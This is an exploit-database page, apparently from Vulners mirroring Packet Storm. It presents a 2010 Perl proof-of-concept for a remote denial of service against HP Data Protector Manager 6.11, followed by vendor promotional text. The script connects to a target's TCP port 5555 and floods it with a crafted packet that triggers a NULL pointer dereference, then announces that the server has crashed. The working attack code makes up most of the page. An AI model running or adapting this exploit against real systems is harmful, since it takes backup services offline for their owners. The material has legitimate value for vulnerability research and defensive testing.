Lucene search
K

HP Data Protector Manager 6.11 Denial Of Service

🗓️ 06 Oct 2010 00:00:00Reported by PepeluxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

HP Data Protector Manager v6.11 Denial of Service Vulnerabilit

Code
`#!/usr/bin/perl  
  
# ===============================  
# HP Data Protector Manager v6.11  
# ===============================  
#  
# Bug: NULL Pointer Dereference Remote Denial of Service Vulnerabilities  
#  
# Software: http://www.hp.com  
# Date: 06/10/2010  
# Author: Pepelux - pepelux[AT]enye-sec[DOT]com  
# http://www.enye-sec.org - http://www.pepelux.org  
#  
# Vulnerable file: Program Files\OmniBack\bin\MSVCR71.dll  
# Vulnerable function: wtoi  
#  
# Tested on Windows XP SP2 & Windows XP SP3  
  
use IO::Socket;  
  
my ($server, $port) = @ARGV ;  
  
unless($ARGV[0] || $ARGV[1]) {  
print "Usage: perl $0 <host> [port]\n";  
print "\tdefault port = 5555\n\n";  
exit 1;  
}  
  
$port = 5555 if ($ARGV[0]);  
  
if ($^O =~ /Win/) {system("cls");}else{system("clear");}  
  
my $buf = "\x00\x00\x00\x41\xff\xfe\x32\x00\x00\x00\x20\x00\x41\x00\x41\x00".  
"\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00".  
"\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00".  
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00".  
"\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\xff\xff\x20\x00\x31\x00".  
"\x35\x00\x00\x00\x00\x00";  
  
print "[+] Connecting to $server:$port ...\n";  
  
my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");  
  
print "[+] Sending malicious packet ...\n";  
  
my $crashed = 0;  
  
while($crashed eq 0) {  
print $sock1 "$buf" or $crashed = 1;  
}  
  
print "\n[x] Server crashed!\n";   
exit;  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Oct 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
15